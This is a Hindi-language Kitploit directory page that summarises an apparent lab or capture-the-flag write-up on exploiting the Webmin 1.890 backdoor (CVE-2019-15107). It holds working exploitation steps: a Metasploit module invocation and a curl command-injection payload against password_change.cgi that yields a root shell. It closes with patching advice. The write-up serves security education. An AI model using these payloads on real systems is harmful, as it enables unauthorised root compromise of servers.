Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Project-Exploitation-of-Webmin-Authentication-Vulnerability — अनुसंधान उद्देश्य: Webmin संस्करण 1.890 (CVE-2019-15107) में एक Remote Code Execution (RCE) भेद्यता का व्यापक विश्लेषण और सफल शोषण करना, अंततः लक्ष्य प्रणाली पर पूर्ण नियंत्रण प्राप्त करना। | Kitploit
उपकरण/GitHubGitHub/artemcyberlab/project-exploitation-of-webmin-authentication-vulnerability
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubartemcyberlab/project-exploitation-of-webmin-authentication-vulnerability

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Project-Exploitation-of-Webmin-Authentication-Vulnerability

अनुसंधान उद्देश्य: Webmin संस्करण 1.890 (CVE-2019-15107) में एक Remote Code Execution (RCE) भेद्यता का व्यापक विश्लेषण और सफल शोषण करना, अंततः लक्ष्य प्रणाली पर पूर्ण नियंत्रण प्राप्त करना।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

शोध उद्देश्य: Webmin संस्करण 1.890 (CVE-2019-15107) में एक रिमोट कोड एक्सिक्यूशन (RCE) कमजोरी का व्यापक विश्लेषण और सफल शोषण करना, अंततः लक्ष्य प्रणाली पर पूर्ण नियंत्रण प्राप्त करना।

कार्यप्रणाली:

प्रारंभिक टोही:

Nmap का उपयोग करके नेटवर्क स्कैनिंग की गई:

bash nmap -sV -sC -A -p- 10.201.105.185

पोर्ट 10000 पर चल रही Webmin 1.890 सेवा की पहचान की गई

कमजोरी विश्लेषण:

password_change.cgi में कमजोरी तंत्र की जांच की गई

बिना प्रमाणीकरण के मनमानी कमांड निष्पादन की संभावना की पुष्टि की गई

शोषण:

दो आक्रमण वेक्टर लागू किए गए:

Metasploit Framework का उपयोग करके:

bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit

curl के माध्यम से मैनुअल शोषण:

bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"

शोषण के बाद:

इंटरैक्टिव रूट शेल प्राप्त किया

फाइलसिस्टम विश्लेषण किया

फ्लैग फाइलें खोजी गईं:

bash /home/dark/user.txt /root/root.txt

निष्कर्ष:

CVE-2019-15107 कमजोरी का सफलतापूर्वक शोषण किया गया

सिस्टम पर पूर्ण रूट विशेषाधिकार प्राप्त किए गए

समय पर सॉफ्टवेयर अपडेट के महत्वपूर्ण महत्व को प्रदर्शित किया गया

तकनीकी निष्कर्ष:

कमजोरी "old" पैरामीटर इंजेक्शन के माध्यम से मनमानी कमांड निष्पादन की अनुमति देती है

प्रमाणीकरण जांचों की कमी इसे विशेष रूप से खतरनाक बनाती है

संस्करण 1.890 में एक बैकडोर है जिसे बाद के रिलीज में पैच किया गया

सुरक्षा अनुशंसाएँ:

वर्तमान Webmin संस्करण में तत्काल अपग्रेड करें

आईपी द्वारा प्रबंधन पैनल तक पहुंच प्रतिबंधित करें

वेब अनुप्रयोगों का नियमित सुरक्षा ऑडिट करें

आगे के शोध दिशाएँ:

अन्य Webmin कमजोरियों का विश्लेषण

Metasploit के बिना कस्टम एक्सप्लॉइट का विकास

समझौता किए गए सिस्टम में स्थायित्व तकनीकों की जांच

यह केस स्टडी समय पर सिस्टम अपडेट के महत्वपूर्ण महत्व और तैनात सॉफ्टवेयर में निरंतर कमजोरी निगरानी की आवश्यकता को प्रदर्शित करता है। यह शोध आधुनिक वेब एप्लिकेशन शोषण तकनीकों में व्यावहारिक अंतर्दृष्टि प्रदान करता है, साथ ही बुनियादी सुरक्षा सिद्धांतों पर जोर देता है।

टूल डाउनलोड करें